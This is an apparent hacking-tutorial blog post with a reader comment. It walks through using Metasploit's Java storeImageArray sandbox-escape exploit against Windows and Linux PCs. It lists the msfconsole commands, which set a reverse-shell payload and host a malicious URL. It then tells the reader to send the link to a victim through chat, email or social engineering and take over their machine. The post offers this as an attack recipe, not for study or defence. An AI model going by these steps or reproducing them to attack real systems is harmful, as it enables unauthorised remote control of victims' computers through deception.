Categories

Archives

Kali Linux, Penetration Testing

Hack Remote Windows or Linux PC with Java store Image Array() Invalid Array Indexing Vulnerability

This module abuses an Invalid Array Indexing Vulnerability on the static function storeImageArray() function in order to produce a memory corruption and finally escape the Java Sandbox. The vulnerability affects Java version 7u21 and earlier. The module, which doesn’t bypass click2play, has been tested successfully on Java 7u21 on Windows and Linux systems.

Exploit Targets

Windows PC

Linux PC

Java 7 update 7

Java 7 update 21

Requirement

Attacker: Kali Linux

Victim PC: Windows XP SP 3

Open Kali Linux terminal type msfconsole

Now type use exploit/multi/browser/java_storeimagearray

msf exploit (java_storeimagearray)>set payload java/shell_reverse_tcp

msf exploit (java_storeimagearray)>set lhost 192.168.1.3 (IP of Local Host)

msf exploit (java_storeimagearray)>set srvhost 192.168.1.3 (This must be an address on the local machine)

msf exploit (java_storeimagearray)>set uripath / (The Url to use for this exploit)

msf exploit (java_storeimagearray)>exploit

Now an URL you should give to your victim http://192.168.1.3:8080

Send the link of the server to the victim via chat or email or any social engineering technique.

Now you have access to the victims PC. Use “sessions -l” and the Session number to connect to the session. And Now Type “sessions -i ID

2 thoughts on “Hack Remote Windows or Linux PC with Java store Image Array() Invalid Array Indexing Vulnerability

  1. when I type ”use exploit/multi/browser/java_storeimagearray” writes Failed to load module: use exploit/multi/browser/java_storeimagearray I am a beginner and I would ask for help

Comments are closed.